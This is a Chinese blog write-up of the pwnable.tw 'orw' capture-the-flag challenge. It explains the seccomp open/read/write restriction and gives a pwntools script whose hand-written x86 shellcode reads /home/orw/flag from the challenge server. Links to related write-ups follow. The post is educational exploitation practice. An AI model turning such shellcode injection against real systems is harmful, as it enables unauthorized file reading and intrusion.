pwnable.tw - orw

最新推荐文章于 2023-05-06 14:22:51 发布
最新推荐文章于 2023-05-06 14:22:51 发布
阅读量3k 收藏
点赞数 1
分类专栏: 二进制漏洞 Linux 文章标签: pwn 二进制漏洞 pwnable.tw
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tan6600/article/details/80967853
版权

简单概览

image_1chkkmh6m17j9j0c85t1l11ustp.png-22.3kB
与 start 不同,该程序使用动态链接

提示仅允许有限的系统调用 open read write 函数

程序运行

image_1chl27d7lfgvl8siov1m5r17bi16.png-8.9kB
哪怕是输入一个字母,程序仍然会出现段错误

检查安全措施

image_1chl2bs2s1f1g106g1csk1h872mn1j.png-14kB
可见栈上开了 CANARY

程序

在 IDA 中反编译可见:
image_1chl3sf5r19ck7eu1dnh1k1i16ht19.png-9.6kB
函数 orw_seccomp 反编译:
image_1chl5lhcibrr3p1cj51ada1mkd1m.png-16.9kB

程序从终端读入内容,存放在 shellcode,然后执行该命令

所以大体过程为先 open 文件,然后 read 读出内容,再 write 打印到终端

from pwn import *
open_shellcode = "xor ecx,ecx;xor edx,edx;mov eax,0x5;push 0x00006761;push 0x6c662f77;push 0x726f2f65;push 0x6d6f682f;mov ebx,esp;int 0x80;"
read_shellcode = "mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x40;int 0x80;"
write_shellcode = "mov eax,0x4;mov ebx,0x1;mov edx,0x40;int 0x80;"
shellcode = open_shellcode + read_shellcode + write_shellcode
payload = asm(shellcode)
io = remote("chall.pwnable.tw", 10001)
io.recvuntil("shellcode:")
io.sendline(payload)
print io.recv()
io.interactive()

/home/orw/flag 转换为 16 进制为 2f686f6d652f6f72772f666c6167,即压栈数据,还要补零

执行就可以得到 flag

BUUCTF:pwnable_orw
qq_44768749的博客
08-27 1708
BUUCTF:pwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
pwnable.tw 1~5 心累
qq_42192672的博客
12-02 649
听说很难,来找虐 1.Start [100 pts] 之前湖湘杯有一题啥防护措施都没开启,我就不会做,所以不敢开心的太早 拖进IDA,这啥东西 还是直接看汇编吧 这是个系统调用 大概就是系统中断之后直接调用吧,边上有注释,不然我直接凉了 来,看一下汇编 先把地址给ecx,给了给长度范围,饭后执行标准输出,输出到终端,然后执行写操作 进入写函数以后,标准读入,长度还是2...
pwnable.tw-orw
qq_35661990的博客
10-27 477
Read the flag from /home/orw/flag. Only open read write syscall are allowed to use. nc chall.pwnable.tw 10001 这是pwnable.tw orw的题目描述,只能用syscall只能用open、read、write 从ida看源代码 int __cdecl main(int ar...
pwnable.tw---orw
杀生丸?不,其实我要的是桔梗
05-01 1582
pwnable.tworw 这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。 题目分析: 照例: 就开了栈保护,虽然都没有什么用。 题目开始就是让你输入shellcode。 就用msf随便试了几下,发现有些被过滤了。 调试看看: 发现调用了seccomp,百度了下是一个linu...
Pwnable.tw orw [Writeup]
柷敔的博客
02-18 586
题源 https://pwnable.tw/challenge/#2 题解 先看一下安全保护情况 再IDA一下源码 其中seccomp是一个开启内核system call保护的函数。通过这一函数可以划定程序准许用户态调用的系统函数,相当于划定白名单,即题目所言【仅开启了open、write、read】。 简单分析函数可知,该程序直接执行了用户输入的shellcode。结合题目意思,可以使用open函数打开flag文件,然后read读出文件内容,最后write输出到控制台。 使用的python程序如下:
pwnable_orw
Morphy_Amo的博客
03-14 264
seccomp沙盒
BUUCTF pwn——pwnable_orw
最新发布
CNS-Enterprise BCC-1701-J
05-06 294
BUUCTF 做题练习
BUUCTF-PWN-pwnable_asm-Sandbox
Rt1Text的博客
07-21 315
检查允许的系统调用orw是允许的,用open()打开flag文件,通过read()和write()读取并输出。
BUUCTF pwnable_orw
weixin_45441024的博客
05-10 401
BUUCTF pwnable_orw 好久不更新博客了,在不更新显得好像自己真的瘦到95斤了似的,上题! 1)还是一如既往地check一下,可以看到程序开启了canary防护,其他的防护并未开启 2)运行一下这个程序,大概了解一下它的运行效果 3)分析这个函数,发现调用了两次prctl,这里决定了程序只能调用open,read,write函数,那我们就必须利用有限的条件来执行,这里有两种写法 ①手动添加汇编代码进行构造 #!/usr/bin/python2 #coding=utf-8 from pwn
pwnable.tw orw writeup
jmp esp
09-27 1924
题目题目比较简单就不复制了,首先seccomp设置了白名单,然后输入0xc8长度shellcode,直接跳到shellcode执行。分析既然是练习,就要彻底一点。 首先是seccomp dump的问题,目前采用的方法是IDApython脚本dump数据下来,然后输入scmp_bpf_disasm。IDApython的文档非常诡异,函数没有说明,函数的参数也不能直接看出来,所以搜了很长时间找了一个别
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1481
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
buuctf pwnable_orw
qq_42728977的博客
04-12 362
限制条件下的shellcode 参考链接: https://www.cnblogs.com/chrysanthemum/p/12323183.html http://www.chiange.com/pwnable-tw-orw/
pwnable.tw - start
不急不躁
07-08 4186
首先安装 pwntools,在执行pip install --upgrade pwntools时出错 cannot import name main 要修改 /usr/bin/pip from pip import main 为 from pip import __main__ sys.exit(__main__._main()) 再次执行即可 安装 peda git cl...
pwnable_orw的wp
wuyvle的博客
03-06 299
好像没见过这样的题 就汇编来讲,就是写入shellcode然后执行 其中orw_seccomp就是syscall的过滤,相当于一个白名单 大概构造 sys_open(filename="/home/orw/flag") sys_read(fd=3,count=0x30) sys_write(fd=1,count=0x30) 当打开一个新的文件时,文件描述符会在系统原有的0、1、2之上增加,POSIX标准要求每次打开文件时必须使用当前进程中最小可用的文件描述符,所以read在写入的时候调用的就是fd=
[BUUCTF-pwn]——pwnable_orw   (ORW
Y_peak的博客
03-16 1241
[BUUCTF-pwn]——pwnable_orw 第一次碰到orw的问题,所谓orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 这个时候可以通过seccomptools,来查看 注意看到prctl就是将系统调用给你禁止了 exploit from pwn import * context.arch = 'i386' p = remote('node3.buuoj.cn',28626) shellcode = she
西门子S7-300编程语句详解
13. **字逻辑指令**:处理字级别的逻辑运算,如ANDW(字与)、ORW(字或)、XORW(字异或)等。 14. **累加器操作指令**:涉及累加器的使用,如ACCU_ADD(累加)、ACCU_SUB(累减)等,累加器在计算过程中保存中间...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值